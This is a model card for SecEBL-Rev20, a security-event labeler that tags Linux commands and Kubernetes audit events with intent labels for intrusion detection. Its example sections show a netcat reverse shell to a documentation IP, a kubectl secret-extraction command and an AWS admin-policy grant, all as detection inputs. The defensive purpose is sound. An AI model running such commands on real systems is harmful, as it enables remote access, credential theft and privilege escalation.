---
license: apache-2.0
base_model: Alibaba-NLP/gte-modernbert-base
library_name: sentence-transformers
pipeline_tag: sentence-similarity
tags:
- security
- intrusion-detection
- behavior-analytics
- intent-recognition
- linux
- kubernetes
- audit-log
- sentence-transformers
---
# SecEBL-Rev20

**SecEBL** stands for **Security Event Behavior Labeler**.

SecEBL-Rev20 is an intent-recognition model for security telemetry. It maps a
Linux command line or normalized Kubernetes AuditLog event into ranked
behavior-intent labels, so downstream detection can reason about what an actor
is trying to do instead of only matching fixed strings, allowlists, blacklists,
or opaque risk scores.

Project repository: [github.com/EBWi11/SecEBL](https://github.com/EBWi11/SecEBL)
## At A Glance

| Area | Current release summary |
| --- | --- |
| Stable public API | L1 behavior-intent labeling with ranked `top_labels`. |
| Behavior vocabulary | 361 Rev20 behavior-intent tags across 12 security behavior groups. |
| Training scale | 86,285 internal corpus rows, 82,895 usable training observations, and 118,858 effective command/tag training pairs. |
| Corpus breadth | Linux commands plus normalized Kubernetes AuditLog events, covering roughly 2,700 distinct Linux first-token/tool forms and common security/operations tooling. |
| Benchmark scale | 12,594-row internal Linux command benchmark covering all 361 behavior tags, 663 internal Linux sessions, and a 6,286,568-row / 102,117-session pressure stream. |
| L1 accuracy | 98.49% top5 any-hit and 96.44% micro recall@5 on the internal Linux command benchmark; 100.00% top5 coverage on the K8s evaluation set. |
| Inference performance | RTX 5090 spot-check: mean 5,308.72 unique cmdlines/s with FP16 + SDPA; exact raw-event cache lookup measured separately at about 1.8M rows/s. |
| Training setup | `Alibaba-NLP/gte-modernbert-base`, MNRL with hard-negative-aware batches, RTX 5090 32GB, 128 full-pass epochs, batch size 112, about 16.2 hours. |

The public examples include a reviewed, publicly releasable subset of the
internal Linux final benchmark plus normalized Kubernetes AuditLog examples:
10,520 Linux rows across 531 sessions and 144 K8s rows across 46 sessions. They
exist so users can run the model locally and inspect outputs without access to
private telemetry.

The full training corpora, full internal benchmarks, private pressure-stream
rows, and private run logs are not redistributed because parts of them contain
real telemetry or real operational context.
## First-Time User Path

Use the companion GitHub repository for the runnable code and this Hugging Face
repository for model artifacts:

```bash
git clone https://github.com/EBWi11/SecEBL.git
cd SecEBL
git lfs install
git clone https://huggingface.co/willchen0011/SecEBL model_artifacts
pip install -e .
scripts/run_examples.sh
```

After the script finishes, inspect:

```text
runs/examples/linux_l1/predictions.jsonl
runs/examples/l2/example_linux_session_results.json
```

L1 is the stable behavior-labeling API. It outputs ranked behavior evidence,
not an intrusion verdict. L2 is optional and experimental; it runs only when an
L2 artifact such as `model_artifacts/l2_artifacts/logreg.joblib` is available.
## What This Repository Contains

This Hugging Face repository is the model artifact bundle.

| Path | Purpose |
| --- | --- |
| `model.safetensors`, tokenizer/config files | SentenceTransformers-compatible SecEBL-Rev20 embedding model. |
| `semantic_texts.jsonl` | Rev20 semantic label texts used by the L1 retrieval path. |
| `schema/tags_schema_rev20.json` | Canonical Rev20 behavior vocabulary, 361 tags across 12 groups. |
| `examples/linux/` | Public subset of the internal Linux final benchmark and matching Rev20 labels. |
| `examples/k8s/` | Public normalized Kubernetes AuditLog examples and matching Rev20 labels. |
| `examples/manifest.json` | Public example subset counts and distribution. |
| `rev20_tag_rfc.md` | Rev20 behavior-tag labeling RFC and boundary examples. |
| `l2_artifacts/logreg.joblib` | Experimental L2 logistic-regression session scorer. |
| `l2_artifacts/tag_risk_policy.rev20.json` | Matching L2 feature policy. Its tag-selection settings are internal to L2 feature extraction. |
| `l2_artifacts/train_summary.json` | Public aggregate L2 training/evaluation summary with no raw rows or real session identifiers. |
| `LICENSE`, `NOTICE` | Model license and attribution notices. |

This repository does not include the runnable helper scripts. Use
[EBWi11/SecEBL](https://github.com/EBWi11/SecEBL) for the Python package and
one-command test script. The same public benchmark-subset examples are included
here for convenience.
## Output Shape

L1 predictions expose ranked `top_labels`:

```json
{
  "observation_id": "event:0",
  "command": "nc -e /bin/sh 203.0.113.10 4444",
  "top_labels": [
    {
      "label_id": "spawn_reverse_shell",
      "score": 0.811,
      "axis": "execution_and_process"
    },
    {
      "label_id": "connect_external_service",
      "score": 0.488,
      "axis": "network"
    }
  ]
}
```

L1 does not emit `behavior_tags` and does not apply a user-facing tag-selection
threshold. `behavior_tags[]` is the field used by training and evaluation label
files. Runtime prediction output is ranked `top_labels`.
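
Because L1 leaves thresholding to the consumer, downstream code typically reads the ranked list and applies its own cut-off. The following is a minimal sketch of that, assuming each record has the shape shown in the example above. The helper name `labels_above` and the `0.6` cut-off are hypothetical and not part of the release.

```python
import json

# One L1 prediction record, copied from the example output above.
RECORD = """
{"observation_id": "event:0",
 "command": "nc -e /bin/sh 203.0.113.10 4444",
 "top_labels": [
   {"label_id": "spawn_reverse_shell", "score": 0.811, "axis": "execution_and_process"},
   {"label_id": "connect_external_service", "score": 0.488, "axis": "network"}
 ]}
"""


def labels_above(record, min_score):
    """Return (label_id, score) pairs with score >= min_score.

    min_score is a caller-side choice (hypothetical); L1 itself applies
    no user-facing threshold.
    """
    return [
        (label["label_id"], label["score"])
        for label in record["top_labels"]
        if label["score"] >= min_score
    ]


record = json.loads(RECORD)
best = record["top_labels"][0]      # top_labels is already ranked
strong = labels_above(record, 0.6)  # consumer-side filtering

print(best["label_id"], best["score"])
print(strong)
```

The same loop could be applied line by line to `runs/examples/linux_l1/predictions.jsonl`, assuming that file holds one such JSON record per line.
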
## Why Intent Labels Matter

Traditional IDS pipelines often depend on signatures, rules, allowlists,
blacklists, and low-explainability tabular ML. Those tools still matter, but
they can struggle when legitimate tools are used in suspicious ways, when tool
syntax drifts quickly, or when the same behavior appears in different telemetry
formats.

SecEBL adds an intermediate representation:

```text
raw security event
-> L1 behavior-intent recognition
-> L2 session reasoning or another downstream detector
-> alert / review / policy
```

L1 intentionally does not decide that a single event is an intrusion. It
produces explainable behavior evidence such as `read_credential_material`,
`execute_remote_command`, `create_scheduled_task`, `grant_cluster_privilege`,
or `query_service_health`.

This is useful for:

- LOTL / living-off-the-land behavior, where the tool is legitimate but the
  behavior may be suspicious in context.
- Rule-writing lag, where new tool syntax appears faster than signatures can be
  maintained.
- Multi-platform telemetry, where Linux commands, Kubernetes audit events, and
  future telemetry can share a behavior vocabulary.
- Explainable detection, where an alert should be tied to explicit behavior
  labels rather than only an opaque score.
## Data And Vocabulary

Rev20 is a flat behavior-tag schema.

| Item | Count |
| --- | ---: |
| Top-level behavior groups | 12 |
| Behavior tags | 361 |

Schema groups:

| Group | Tags |
| --- | ---: |
| `observation_and_discovery` | 51 |
| `configuration_and_log_modification` | 12 |
| `filesystem_and_data` | 33 |
| `execution_and_process` | 28 |
| `network` | 51 |
| `identity_auth_and_secrets` | 31 |
| `persistence_services_and_storage` | 27 |
| `kernel_memory_and_tracing` | 14 |
| `package_build_and_source` | 19 |
| `database_and_infrastructure_services` | 33 |
| `containers_and_cloud_native` | 34 |
| `cloud_control_plane` | 28 |

The release baseline was trained from internal Rev20 corpora:

| Corpus | Rows | Unique behavior tags | Notes |
| --- | ---: | ---: | --- |
| Linux command corpus | 85,277 | 361 | Mixed generated, reviewed, and manually expanded command examples. |
| Kubernetes AuditLog corpus | 1,008 | 40 | Manually authored normalized K8s audit events. |

The Linux corpus covers roughly 2,700 distinct first-token/tool forms by a
conservative executable-name estimate. Common families include shell utilities,
network tools, package/build tools, cloud CLIs, IaC tools, container tooling,
databases, secret stores, and Kubernetes tooling.
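
The per-group tag counts can be cross-checked against the 361-tag total. The snippet below is a small arithmetic check that copies its numbers from the schema group table. It does not read `schema/tags_schema_rev20.json`, whose internal layout is not described in this card.

```python
# Tag counts per schema group, copied from the table in this section.
GROUP_TAG_COUNTS = {
    "observation_and_discovery": 51,
    "configuration_and_log_modification": 12,
    "filesystem_and_data": 33,
    "execution_and_process": 28,
    "network": 51,
    "identity_auth_and_secrets": 31,
    "persistence_services_and_storage": 27,
    "kernel_memory_and_tracing": 14,
    "package_build_and_source": 19,
    "database_and_infrastructure_services": 33,
    "containers_and_cloud_native": 34,
    "cloud_control_plane": 28,
}

total_tags = sum(GROUP_TAG_COUNTS.values())
largest = max(GROUP_TAG_COUNTS.values())
largest_groups = sorted(g for g, n in GROUP_TAG_COUNTS.items() if n == largest)

print(len(GROUP_TAG_COUNTS), "groups,", total_tags, "tags")
print("largest groups:", largest_groups)
```
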
## Training Details

The raw training corpora are not redistributed, but the following details are
documented so readers can understand the model scale and method.

| Item | Value |
| --- | --- |
| Base model | `Alibaba-NLP/gte-modernbert-base` |
| Training objective | `MultipleNegativesRankingLoss` with hard-negative-aware batches |
| Training hardware | NVIDIA GeForce RTX 5090, 32GB VRAM, `cuda:0` |
| Epochs | 128 full-pass epochs |
| Batch size | 112 |
| Precision | `fp32` |
| Steps | 1,062 steps per epoch; 135,936 total optimizer steps |
| Runtime | 58,291 seconds, about 16.2 hours |
| Sequence length | 160 tokens |
| Optimizer schedule | learning rate `2e-5`, warmup ratio `0.06`, 8,156 warmup steps, weight decay `0.01` |

Training data scale:

| Training artifact | Count | Notes |
| --- | ---: | --- |
| Combined corpus rows | 86,285 | 85,277 Linux command rows plus 1,008 K8s AuditLog rows. |
| Non-empty training observations | 82,895 | Rows with usable behavior labels after skipping 3,390 abstain rows. |
| Base command-tag pairs | 117,092 | Positive command/tag pairs before boundary upsampling. |
| Effective positive pairs | 118,858 | Final pair count after targeted boundary upsampling. |
| Behavior labels | 361 | Full Rev20 behavior vocabulary used on the label side. |

The Linux corpus is intentionally mixed rather than a single synthetic source.
The largest source slices are roughly 36.9k generated rows, 28.5k manually
reviewed rows, 4.0k benchmark-prune/migration rows, 3.6k common-difference gap
rows, 2.7k reviewed generated rows, 2.6k baseline manual rows, and 2.3k attack
batch rows, plus smaller targeted boundary, miss-review, public-attack, and
high-miss batches.

Token lengths are short enough for a compact encoder. Across the final pair set,
command-side text is p50 32 tokens, p90 55, p95 68, and p99 113; fewer than
0.3% of examples exceed the 160-token training limit. Label-side semantic texts
are p50 40 tokens and p95 62.
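
The step, warmup, and runtime figures in the tables above follow from the pair count, batch size, and epoch count. The sketch below reproduces that arithmetic, assuming the last partial batch of each epoch is kept (ceiling division) and the warmup step count is rounded down. Both are assumptions about the trainer, chosen because they match the published numbers.

```python
import math

# Values copied from the training tables above.
effective_pairs = 118_858
batch_size = 112
epochs = 128
warmup_ratio = 0.06
runtime_seconds = 58_291

# Assumption: the final partial batch of each epoch is kept.
steps_per_epoch = math.ceil(effective_pairs / batch_size)
total_steps = steps_per_epoch * epochs

# Assumption: warmup steps are the floored product of ratio and total steps.
warmup_steps = int(total_steps * warmup_ratio)
runtime_hours = runtime_seconds / 3600

# Cross-checks on the corpus counts.
combined_rows = 85_277 + 1_008
usable_rows = combined_rows - 3_390
upsampled_pairs = 117_092 + 1_766

print(steps_per_epoch, total_steps, warmup_steps, round(runtime_hours, 1))
print(combined_rows, usable_rows, upsampled_pairs)
```
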

Hard negatives were designed in two layers, complemented by boundary
upsampling:

- Schema-level negatives: the dataset builder used `schema_hard`, with a
  16-item hard-negative pool and up to 8 negatives per positive before MNRL
  batching. These negatives come from semantically nearby Rev20 tags, so the
  model is forced to separate labels such as read-vs-search, inspect-vs-modify,
  local-vs-remote execution, and similar tool-boundary cases.
- Batch-level negatives: the training loader used hard-negative-aware MNRL
  batches. The final run used config
  `rev20_conservative_20260620_ep96_miss_v11`, covering 74 difficult labels and
  placing 2 hard-negative labels near each anchor where possible.
- Boundary upsampling: 1,766 boundary-sensitive pairs were duplicated once,
  producing 1,766 extra training exposures. These rows target recurring failure
  modes such as grep/read ambiguity, wrapper commands, tool-specific boundaries,
  no-hit review cases, and post-evaluation miss-review batches.
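
To illustrate why nearby labels make useful negatives, here is a minimal pure-Python sketch of a multiple-negatives ranking objective. Each anchor is scored against every candidate in the batch, and cross-entropy pushes its own positive to the top. The 2-D vectors are toy data and `mnrl_loss` is a hypothetical helper, not the release training code. The `scale=20.0` default mirrors the sentence-transformers default for `MultipleNegativesRankingLoss`.

```python
import math


def cosine(u, v):
    """Cosine similarity of two equal-length vectors."""
    dot = sum(a * b for a, b in zip(u, v))
    norm_u = math.sqrt(sum(a * a for a in u))
    norm_v = math.sqrt(sum(b * b for b in v))
    return dot / (norm_u * norm_v)


def mnrl_loss(anchors, positives, hard_negatives=(), scale=20.0):
    """Mean cross-entropy where anchor i must rank positive i first.

    Candidates are all in-batch positives followed by any extra hard
    negatives, so every other candidate acts as a negative for anchor i.
    """
    candidates = list(positives) + list(hard_negatives)
    total = 0.0
    for i, anchor in enumerate(anchors):
        logits = [scale * cosine(anchor, c) for c in candidates]
        peak = max(logits)  # subtract the max for a stable log-sum-exp
        log_z = peak + math.log(sum(math.exp(x - peak) for x in logits))
        total += log_z - logits[i]
    return total / len(anchors)


# Toy embeddings: two command anchors and their matching label texts.
anchors = [[1.0, 0.0], [0.0, 1.0]]
positives = [[0.9, 0.1], [0.1, 0.9]]
# A semantically nearby but wrong label for the first anchor.
hard_negatives = [[0.8, 0.3]]

easy_loss = mnrl_loss(anchors, positives)
hard_loss = mnrl_loss(anchors, positives, hard_negatives)
print(easy_loss, hard_loss)
```

Adding the nearby negative raises the loss on this batch, which is the pressure that forces the encoder to separate boundary cases such as read-vs-search.
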
## Public Benchmark Subset

This Hugging Face repository includes the same public benchmark examples as the
companion GitHub repository: the Linux benchmark subset under `examples/linux/`
and normalized Kubernetes AuditLog examples under `examples/k8s/`.

| Public artifact | Rows | Sessions | Notes |
| --- | ---: | ---: | --- |
| `examples/linux/example_sessions.jsonl` | 10,520 | 531 | Publicly releasable subset of the internal Linux final benchmark; 2,934 normal-operation rows and 7,586 intrusion rows. |
| `examples/linux/example_gold.rev20.jsonl` | 10,520 | 531 | Matching Rev20 behavior labels; 10,019 labeled rows, 14,807 behavior-label instances, and 349 unique behavior tags. |
| `examples/k8s/example_sessions.jsonl` | 144 | 46 | Public normalized Kubernetes AuditLog examples; 72 normal-operation rows and 72 intrusion rows. |
| `examples/k8s/example_gold.rev20.jsonl` | 144 | 46 | Matching Rev20 behavior labels; 144 labeled rows, 163 behavior-label instances, and 27 unique behavior tags. |

Session-level labels use English enums: `normal_operation` and `intrusion`.

The full internal Linux benchmark remains larger: 12,594 rows, 663 sessions,
and complete 361-tag coverage.
## Evaluation Snapshot

The full internal benchmark data is not public. The aggregate size,
distribution, and metrics are public so users can understand what the headline
numbers mean.

Evaluation scale:

| Dataset | Rows | Rows with labels | Behavior-tag instances | Unique behavior tags |
| --- | ---: | ---: | ---: | ---: |
| Linux internal benchmark | 12,594 | 11,889 | 17,287 | 361 / 361 |
| K8s evaluation set | 144 | 144 | 163 | 27 / 361 |
| Combined | 12,738 | 12,033 | 17,450 | 361 / 361 |

Retrieval quality:

| Dataset | Dynamic exact | Top5 any-hit | Top5 all-covered | Micro recall@5 |
| --- | ---: | ---: | ---: | ---: |
| Linux internal benchmark | 87.32% | 98.49% | 95.44% | 96.44% |
| K8s evaluation set | 99.31% | 100.00% | 100.00% | 100.00% |
| Combined | 87.47% | 98.50% | 95.50% | 96.47% |

The Linux benchmark covers the complete 361-tag Rev20 vocabulary and includes
complex multi-tag command rows. The K8s result should be read as a small-domain
sanity result rather than broad Kubernetes coverage because the current K8s
corpus is much smaller than the Linux corpus.
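
The card does not spell out the metric formulas, so the sketch below shows one plausible reading of the top-5 columns, computed over rows that carry at least one gold tag. Any-hit counts a row when any gold tag appears in the top 5, all-covered requires every gold tag to appear, and micro recall@5 divides recovered gold tags by all gold tags. These definitions and the `top5_metrics` helper are assumptions for illustration. "Dynamic exact" is not reproduced because its definition is not stated here.

```python
def top5_metrics(rows, k=5):
    """Compute any-hit, all-covered, and micro recall@k.

    rows: iterable of (gold_tags, ranked_predictions) pairs.
    Rows without gold tags are skipped (assumed denominator).
    """
    labeled = [(set(gold), ranked[:k]) for gold, ranked in rows if gold]
    any_hit = all_covered = recovered = gold_total = 0
    for gold, top_k in labeled:
        found = gold & set(top_k)
        any_hit += bool(found)        # at least one gold tag retrieved
        all_covered += found == gold  # every gold tag retrieved
        recovered += len(found)
        gold_total += len(gold)
    n = len(labeled)
    return {
        "any_hit": any_hit / n,
        "all_covered": all_covered / n,
        "micro_recall": recovered / gold_total,
    }


# Toy rows with placeholder tag names, not real benchmark data.
rows = [
    (["a"], ["a", "b", "c", "d", "e"]),       # full hit
    (["a", "b"], ["a", "x", "y", "z", "w"]),  # partial hit
    (["c"], ["x", "y", "z", "w", "v"]),       # miss
    ([], ["a", "b", "c", "d", "e"]),          # unlabeled, skipped
]

metrics = top5_metrics(rows)
print(metrics)
```

Under this reading, a row with six or more gold tags can never count as all-covered at k=5, which is one reason all-covered sits below any-hit on a multi-tag benchmark.
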

Internal Linux benchmark tag cardinality:

| Tags per row | Rows |
| --- | ---: |
| 0 | 705 |
| 1 | 8,829 |
| 2 | 1,567 |
| 3 | 901 |
| 4 | 402 |
| 5 | 139 |
| 6+ | 51 |

Top internal Linux benchmark tags:

| Tag | Count |
| --- | ---: |
| `stage_temporary_path` | 987 |
| `inspect_network_state` | 801 |
| `stage_hidden_path` | 655 |
| `inspect_current_identity` | 578 |
| `read_credential_material` | 551 |
| `inspect_system_state` | 481 |
| `inspect_infrastructure_service` | 390 |
| `query_dns_records` | 372 |
| `enumerate_filesystem` | 365 |
| `search_credentials` | 315 |
## Example Outputs

These examples show the user-facing L1 output style. Scores are cosine
retrieval scores computed with the release prompt profile applied. The public
helper scripts save top labels in `predictions.jsonl`.

| Event | Top 3 L1 tags | Note |
| --- | --- | --- |
| `nc -e /bin/sh 203.0.113.10 4444` | <code>spawn_reverse_shell</code> 0.811<br><code>connect_external_service</code> 0.488<br><code>spawn_bind_shell</code> 0.451 | `-e` is recognized as reverse-shell execution. |
| `nc -v 203.0.113.10 443` | <code>connect_external_service</code> 0.732<br><code>spawn_reverse_shell</code> 0.503<br><code>create_reverse_tunnel</code> 0.412 | Connection intent ranks above shell-spawn intent. |
| `cat /root/install.log` | <code>read_business_log</code> 0.641<br><code>read_system_log</code> 0.431<br><code>read_workload_logs</code> 0.385 | Log-read semantics dominate. |
| `cat /root/install.conf` | <code>read_infrastructure_config</code> 0.620<br><code>read_system_config</code> 0.612<br><code>read_kernel_parameter</code> 0.336 | Config-read semantics dominate. |
| `kubectl -n prod get secret payment-api-token -o jsonpath={.data.token} \| base64 -d` | <code>read_cluster_secret</code> 0.730<br><code>decode_data</code> 0.716<br><code>read_credential_material</code> 0.363 | K8s secret extraction and decoding. |
| `aws iam attach-user-policy --user-name temp --policy-arn arn:aws:iam::aws:policy/AdministratorAccess` | <code>grant_cloud_privilege</code> 0.838<br><code>modify_cloud_identity_policy</code> 0.535<br><code>modify_cloud_identity</code> 0.459 | Cloud privilege escalation semantics. |
| `curl -fsS http://127.0.0.1:8080/healthz` | <code>query_service_health</code> 0.840<br><code>inspect_local_kubernetes_cluster</code> 0.459<br><code>inspect_container_runtime</code> 0.383 | Local service health check. |
## Runtime Performance

SecEBL-Rev20 is a SentenceTransformers-style embedding retriever over 361 Rev20
tag definitions. The serving path embeds the event, embeds or loads tag
definition embeddings, then ranks tags by similarity.

Current single-card CUDA recommendation:

| Setting | Value |
| --- | --- |
| Precision | FP16 |
| Attention | SDPA |
| `max_seq_length` | 160 |
| Batch size | 224 default; 384 was slightly faster in one RTX 5090 sweep but not enough to replace the stable default |
| Sorting | `sort_by=char` |
| Padding | dynamic, no forced pad alignment |
| Output path | GPU tensor output plus GPU top-k |

Measured on an NVIDIA GeForce RTX 5090 32GB spot-check:

| Mode | Throughput |
| --- | ---: |
| Recommended no-cache unique inference, `bs224` | mean 5,308.72 unique cmdlines/s |
| Recommended no-cache latency, `bs224` | about 0.1884 ms per unique cmdline |
| `bs224` repeat range | 5,025.47 - 5,433.78 unique cmdlines/s |
| Best quick-sweep point, `bs384` | 5,378.45 unique cmdlines/s |

Exact raw-event cache lookup was measured separately at mean 1,817,462.76
rows/s. Cache hits reuse saved L1 top-k results and do not run model inference.
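
The exact-match cache idea can be sketched as a dictionary keyed by the raw event string, so repeated events skip the model entirely. The `L1Cache` class and `fake_label_fn` below are hypothetical stand-ins, not the release implementation. The snippet also shows how the per-cmdline latency in the table follows from the mean throughput.

```python
class L1Cache:
    """Exact raw-event cache in front of an L1 labeling function."""

    def __init__(self, label_fn):
        self._label_fn = label_fn
        self._store = {}
        self.model_calls = 0  # number of cache misses that reached the model

    def lookup(self, raw_event):
        cached = self._store.get(raw_event)
        if cached is None:
            # Cache miss: run the (expensive) labeler once and remember it.
            self.model_calls += 1
            cached = self._label_fn(raw_event)
            self._store[raw_event] = cached
        return cached


def fake_label_fn(raw_event):
    """Stand-in for model inference; returns a fixed top-k list."""
    return [{"label_id": "query_service_health", "score": 0.840}]


cache = L1Cache(fake_label_fn)
stream = [
    "curl -fsS http://127.0.0.1:8080/healthz",
    "curl -fsS http://127.0.0.1:8080/healthz",  # exact repeat, served from cache
    "curl -fsS http://127.0.0.1:8081/healthz",
]
results = [cache.lookup(event) for event in stream]

# Latency implied by the mean no-cache throughput reported above.
ms_per_cmdline = 1000 / 5308.72

print(cache.model_calls, round(ms_per_cmdline, 4))
```

Only byte-identical events hit this cache; near-duplicates such as the different port in the third event still go through inference.
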
## L2 Artifact

This repository includes an experimental fitted L2 session scorer so the
companion GitHub `scripts/run_examples.sh` can run the public Linux and K8s L1
examples, plus Linux example-session scoring, when this model directory is used
as `MODEL_DIR`.

In this release, a **session** is a sequence of events grouped by `session_id`.
L1 labels each event independently. L2 scores the whole session by aggregating
cached L1 ranked tags, retrieval scores, tag diversity, behavior transitions,
and routine-operation context. The L2 output is a session-level verdict such as
`intrusion` or `normal_operation`, not a replacement for per-command behavior
tags.

For compatibility with the released L2 artifact, L2 derives its session
features from cached L1 `top_labels` using an internal selected-tag feature
path. In plain terms, L2 filters the cached ranked labels inside its own feature
builder before session scoring. This does not change L1 prediction output:
users still receive ranked `top_labels`, not a selected `behavior_tags` field.

Runtime L2 does not use raw command text, user names, host names, or session ids
as scoring features. Session ids may appear in private data-prep workflows for
label assignment, but they are not runtime allow/deny lists.
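
As a rough illustration of session-level aggregation, the sketch below groups events by `session_id` and derives a few features from each event's top-ranked label. The feature names and the use of only the top-1 label are assumptions made for this example. The released L2 feature builder uses its own internal tag-selection path, which is not reproduced here.

```python
from collections import defaultdict


def session_features(events):
    """Aggregate per-event L1 top labels into per-session features.

    Assumes every event has a session_id and a non-empty top_labels list.
    The session_id is used only for grouping, never as a feature.
    """
    by_session = defaultdict(list)
    for event in events:
        by_session[event["session_id"]].append(event["top_labels"][0])

    features = {}
    for session_id, tops in by_session.items():
        ids = [top["label_id"] for top in tops]
        features[session_id] = {
            "n_events": len(ids),
            "tag_diversity": len(set(ids)),
            # Count changes between consecutive top-1 labels.
            "transitions": sum(a != b for a, b in zip(ids, ids[1:])),
            "max_score": max(top["score"] for top in tops),
        }
    return features


def _event(session_id, label_id, score):
    """Build a toy event carrying a single ranked label."""
    return {"session_id": session_id, "top_labels": [{"label_id": label_id, "score": score}]}


# Toy sessions; label names come from this card, scores are illustrative.
events = [
    _event("s1", "inspect_current_identity", 0.70),
    _event("s1", "read_credential_material", 0.65),
    _event("s1", "spawn_reverse_shell", 0.811),
    _event("s2", "query_service_health", 0.840),
    _event("s2", "query_service_health", 0.840),
]

features = session_features(events)
print(features)
```

A downstream scorer such as a logistic regression would consume vectors like these rather than raw command text, in line with the runtime constraints described above.
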

Internal L2 summary:

| Check | Result |
| --- | ---: |
| Withheld Linux session benchmark | 663 sessions, 365 TP, 298 TN, 0 FP, 0 FN |
| 7M pressure-stream fit-check | 6,286,568 rows, 102,117 sessions, 61 alert sessions |
| Out-of-fold (OOF) validation | 5,747 sessions, 99.39% accuracy, 96.44% attack precision, 95.31% attack recall |

The 7M pressure-stream result was measured on real background telemetry plus
embedded synthetic attack sessions. The underlying rows and real session
identifiers are not redistributed. The included L2 artifact is a
research/reproducibility component, not a general production IDS claim.
## Direct SentenceTransformers Loading

You can load the embedding model directly:

```python
from sentence_transformers import SentenceTransformer
model = SentenceTransformer("willchen0011/SecEBL")
```

Direct loading gives you the encoder only. SecEBL is a retrieval-style labeler:
encode the event, encode or load the Rev20 semantic label texts from
`semantic_texts.jsonl`, rank labels by cosine similarity, and save the top-k
labels. For normal use, prefer the companion GitHub helpers because they keep
the prompt profile, semantic text loading, top-k output format, and optional L2
feature path aligned with this release.
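
For readers who want to see the retrieval steps spelled out, here is a minimal sketch. `rank_labels` is a pure-Python ranking helper, and `label_event` shows how it could be wired to the encoder. Both names are hypothetical, and `label_texts` is assumed to be a `label_id -> text` mapping the caller has already built from `semantic_texts.jsonl`, whose field names are not documented here. The sketch does not apply the release prompt profile, so its scores may differ from those of the official helpers.

```python
def rank_labels(event_vec, label_vecs, label_ids, k=5):
    """Rank labels by dot product with the event vector.

    For unit-length vectors the dot product equals cosine similarity.
    """
    scored = [
        (sum(a * b for a, b in zip(event_vec, vec)), label_id)
        for label_id, vec in zip(label_ids, label_vecs)
    ]
    scored.sort(reverse=True)
    return [{"label_id": lid, "score": round(s, 3)} for s, lid in scored[:k]]


def label_event(command, label_texts, model_name="willchen0011/SecEBL", k=5):
    """Encode one event and all label texts, then return ranked top labels.

    label_texts: dict mapping label_id to semantic text (caller-provided).
    Requires sentence-transformers; imported lazily so rank_labels stays
    usable without it.
    """
    from sentence_transformers import SentenceTransformer

    model = SentenceTransformer(model_name)
    ids = list(label_texts)
    texts = [command] + [label_texts[i] for i in ids]
    # normalize_embeddings=True yields unit vectors, so dot product = cosine.
    vecs = model.encode(texts, normalize_embeddings=True)
    return rank_labels(vecs[0].tolist(), vecs[1:].tolist(), ids, k)


# Toy unit vectors standing in for real embeddings.
toy_ids = ["a", "b", "c"]
toy_vecs = [[1.0, 0.0], [0.0, 1.0], [0.6, 0.8]]
top = rank_labels([1.0, 0.0], toy_vecs, toy_ids, k=2)
print(top)
```

In a real deployment the label embeddings would be computed once and reused, rather than re-encoded per event as `label_event` does here.
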
## Intended Use

- Research and evaluation of security-event behavior labeling.
- Internal security detection, investigation, and triage for systems an
  organization owns, operates, administers, or is explicitly authorized to
  defend.
- Building session-level risk scoring over SecEBL behavior-label streams.

## Out Of Scope

- Standalone verdicting on a single event.
- Authorization or policy-compliance decisions without human validation.
- Monitoring systems you are not authorized to defend.

## License

This Hugging Face repository is released under **Apache License 2.0**.
The base model is `Alibaba-NLP/gte-modernbert-base`, which is also Apache-2.0.

Source code, schemas, public examples, public documentation, helper scripts,
model artifacts, and the experimental L2 artifact are Apache-2.0 unless a file
explicitly states otherwise.